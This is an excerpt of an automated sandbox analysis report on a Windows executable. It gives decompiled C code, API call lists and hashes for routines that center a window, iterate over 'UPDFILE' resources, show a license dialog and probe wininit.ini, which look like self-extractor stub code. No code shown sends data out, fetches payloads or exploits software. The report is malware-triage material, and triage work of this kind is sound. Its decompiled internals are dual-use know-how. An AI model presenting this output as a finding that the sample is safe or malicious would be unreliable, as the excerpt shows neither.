                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00323938,?,?,?,?,-00000005), ref: 00322958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 00322969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00323938,?,?,?,?,-00000005,?), ref: 00322A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00323938,?,?), ref: 00322A81
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID: 892
                                                                                                                                                                                                                                            • API String ID: 3949799724-325759232
                                                                                                                                                                                                                                            • Opcode ID: 6d3cc126628ee8586a9a6b73294fd961e740daf1dd87a547cc4eb805531bf895
                                                                                                                                                                                                                                            • Instruction ID: 4fe09b110648122b3a19516c3b58b8cbdbf4c815ab8e81ee816af1d46a563b3f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d3cc126628ee8586a9a6b73294fd961e740daf1dd87a547cc4eb805531bf895
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17512B31D00229EFCB22DF98EC85AAEBBB9FF48700F15412AE905E7611DB319941DB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E003243D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                            0x003243d0
                                                                                                                                                                                                                                            0x003243d8
                                                                                                                                                                                                                                            0x003243df
                                                                                                                                                                                                                                            0x003243e6
                                                                                                                                                                                                                                            0x003243ec
                                                                                                                                                                                                                                            0x003243f1
                                                                                                                                                                                                                                            0x00324400
                                                                                                                                                                                                                                            0x00324403
                                                                                                                                                                                                                                            0x0032440b
                                                                                                                                                                                                                                            0x00324420
                                                                                                                                                                                                                                            0x00324429
                                                                                                                                                                                                                                            0x00324437
                                                                                                                                                                                                                                            0x00324444
                                                                                                                                                                                                                                            0x00324447
                                                                                                                                                                                                                                            0x0032444d
                                                                                                                                                                                                                                            0x00324454
                                                                                                                                                                                                                                            0x0032445b
                                                                                                                                                                                                                                            0x00324460
                                                                                                                                                                                                                                            0x00324461
                                                                                                                                                                                                                                            0x00324467
                                                                                                                                                                                                                                            0x0032446f
                                                                                                                                                                                                                                            0x00324473
                                                                                                                                                                                                                                            0x00324473
                                                                                                                                                                                                                                            0x00324463
                                                                                                                                                                                                                                            0x00324463
                                                                                                                                                                                                                                            0x00324463
                                                                                                                                                                                                                                            0x0032447a
                                                                                                                                                                                                                                            0x00324481
                                                                                                                                                                                                                                            0x00324484
                                                                                                                                                                                                                                            0x0032448a
                                                                                                                                                                                                                                            0x00324492
                                                                                                                                                                                                                                            0x00324496
                                                                                                                                                                                                                                            0x00324496
                                                                                                                                                                                                                                            0x00324486
                                                                                                                                                                                                                                            0x00324486
                                                                                                                                                                                                                                            0x00324486
                                                                                                                                                                                                                                            0x003244b8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 003243F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0032440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00324423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0032442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0032443A
                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00324447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003244A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: a79d700a6e61cc9d2b9bfc43e1f1415610f4482d78ed5d4a4a07df37b6b04415
                                                                                                                                                                                                                                            • Instruction ID: 29bb91f11da5985771b48fa29d6f50d1e779896e19907c5d5815cf5e99392a98
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a79d700a6e61cc9d2b9bfc43e1f1415610f4482d78ed5d4a4a07df37b6b04415
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5315E72E00519AFCB15DFB8ED899EEBBB9EB89310F154169F805F3240DA30AC05CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E00326298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E0032171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0x32a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
                                                                                                                                                                                                                                            							E0032171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E00326CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x00326298
                                                                                                                                                                                                                                            0x003262a0
                                                                                                                                                                                                                                            0x003262a7
                                                                                                                                                                                                                                            0x003262ad
                                                                                                                                                                                                                                            0x003262af
                                                                                                                                                                                                                                            0x003262bb
                                                                                                                                                                                                                                            0x003262c3
                                                                                                                                                                                                                                            0x003262c4
                                                                                                                                                                                                                                            0x0032633b
                                                                                                                                                                                                                                            0x0032633b
                                                                                                                                                                                                                                            0x00326345
                                                                                                                                                                                                                                            0x0032634d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003262da
                                                                                                                                                                                                                                            0x003262de
                                                                                                                                                                                                                                            0x0032635f
                                                                                                                                                                                                                                            0x00326369
                                                                                                                                                                                                                                            0x003262e0
                                                                                                                                                                                                                                            0x003262e0
                                                                                                                                                                                                                                            0x003262e0
                                                                                                                                                                                                                                            0x003262e3
                                                                                                                                                                                                                                            0x003262e5
                                                                                                                                                                                                                                            0x003262e5
                                                                                                                                                                                                                                            0x003262e8
                                                                                                                                                                                                                                            0x003262e8
                                                                                                                                                                                                                                            0x003262ea
                                                                                                                                                                                                                                            0x003262eb
                                                                                                                                                                                                                                            0x003262ef
                                                                                                                                                                                                                                            0x003262f1
                                                                                                                                                                                                                                            0x003262f3
                                                                                                                                                                                                                                            0x00326302
                                                                                                                                                                                                                                            0x00326308
                                                                                                                                                                                                                                            0x0032630d
                                                                                                                                                                                                                                            0x00326314
                                                                                                                                                                                                                                            0x00326314
                                                                                                                                                                                                                                            0x00326316
                                                                                                                                                                                                                                            0x00326319
                                                                                                                                                                                                                                            0x00326355
                                                                                                                                                                                                                                            0x00326357
                                                                                                                                                                                                                                            0x0032631b
                                                                                                                                                                                                                                            0x0032631b
                                                                                                                                                                                                                                            0x00326331
                                                                                                                                                                                                                                            0x00326334
                                                                                                                                                                                                                                            0x00326339
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326339
                                                                                                                                                                                                                                            0x00326319
                                                                                                                                                                                                                                            0x0032636b
                                                                                                                                                                                                                                            0x0032637d
                                                                                                                                                                                                                                            0x0032637d
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032171E: _vsnprintf.MSVCRT ref: 00321750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003251CA,00000004,00000024,00322F71,?,00000002,00000000), ref: 003262CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003251CA,00000004,00000024,00322F71,?,00000002,00000000), ref: 003262D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003251CA,00000004,00000024,00322F71,?,00000002,00000000), ref: 0032631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00326345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003251CA,00000004,00000024,00322F71,?,00000002,00000000), ref: 00326357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: 854a7312a61c14b9b22c3838fb28d8bb0108003bed7a7cddab438de41700119a
                                                                                                                                                                                                                                            • Instruction ID: efc50f25052dbcbff8695f421c7cf764a34d35d40643f76cd4bae4c0bf616ff2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 854a7312a61c14b9b22c3838fb28d8bb0108003bed7a7cddab438de41700119a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A221F675A00229ABDB22DF64AC469FE7B7CFF48710F114119FA02A3251DB759D028BE0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00323A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E0032468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0x328d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E0032468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0x328d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0x328d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0x329124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E00326517(_t19, 0x7d1, 0, E00323100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0x328d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x329124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E003244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0x328d4c);
                                                                                                                                                                                                                                            					 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E003244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x329124 = E00326285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x00323a46
                                                                                                                                                                                                                                            0x00323a57
                                                                                                                                                                                                                                            0x00323a5d
                                                                                                                                                                                                                                            0x00323a63
                                                                                                                                                                                                                                            0x00323a6a
                                                                                                                                                                                                                                            0x00323a91
                                                                                                                                                                                                                                            0x00323a9a
                                                                                                                                                                                                                                            0x00323ad8
                                                                                                                                                                                                                                            0x00323b13
                                                                                                                                                                                                                                            0x00323b19
                                                                                                                                                                                                                                            0x00323b1b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323b21
                                                                                                                                                                                                                                            0x00323ae7
                                                                                                                                                                                                                                            0x00323af4
                                                                                                                                                                                                                                            0x00323afc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323afe
                                                                                                                                                                                                                                            0x00323a87
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323a87
                                                                                                                                                                                                                                            0x00323aa8
                                                                                                                                                                                                                                            0x00323ab3
                                                                                                                                                                                                                                            0x00323ab9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323ab9
                                                                                                                                                                                                                                            0x00323a78
                                                                                                                                                                                                                                            0x00323a82
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00322F64,?,00000002,00000000), ref: 00323A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00323AB3
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                              • Part of subcall function 00326285: GetLastError.KERNEL32(00325BBC), ref: 00326285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00323AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00323B13
                                                                                                                                                                                                                                              • Part of subcall function 00326517: FindResourceA.KERNEL32(00320000,000007D6,00000005), ref: 0032652A
                                                                                                                                                                                                                                              • Part of subcall function 00326517: LoadResource.KERNEL32(00320000,00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00326538
                                                                                                                                                                                                                                              • Part of subcall function 00326517: DialogBoxIndirectParamA.USER32(00320000,00000000,00000547,003219E0,00000000), ref: 00326557
                                                                                                                                                                                                                                              • Part of subcall function 00326517: FreeResource.KERNEL32(00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00326560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00323100,00000000,00000000), ref: 00323AF4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                            • Opcode ID: 24096ab5b9a79449a9c069a3dadb1c5ef0198c3767381c217049065cbdfd0fa9
                                                                                                                                                                                                                                            • Instruction ID: e8bc676467f8779e2f32114533bf980095832ffd1b5553f372b38e84ba54bb1e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24096ab5b9a79449a9c069a3dadb1c5ef0198c3767381c217049065cbdfd0fa9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E11D630601221ABD733AF33BC0AF177ABDDBD5700F10483EB946DA1A1DA7998168660
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E003224E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E0032658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x003224e0
                                                                                                                                                                                                                                            0x003224eb
                                                                                                                                                                                                                                            0x003224f2
                                                                                                                                                                                                                                            0x003224f7
                                                                                                                                                                                                                                            0x00322504
                                                                                                                                                                                                                                            0x0032250e
                                                                                                                                                                                                                                            0x0032251d
                                                                                                                                                                                                                                            0x0032252c
                                                                                                                                                                                                                                            0x00322541
                                                                                                                                                                                                                                            0x00322546
                                                                                                                                                                                                                                            0x00322553
                                                                                                                                                                                                                                            0x00322555
                                                                                                                                                                                                                                            0x00322555
                                                                                                                                                                                                                                            0x00322546
                                                                                                                                                                                                                                            0x0032256c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00322506
                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0032252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32 ref: 0032253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0032254C
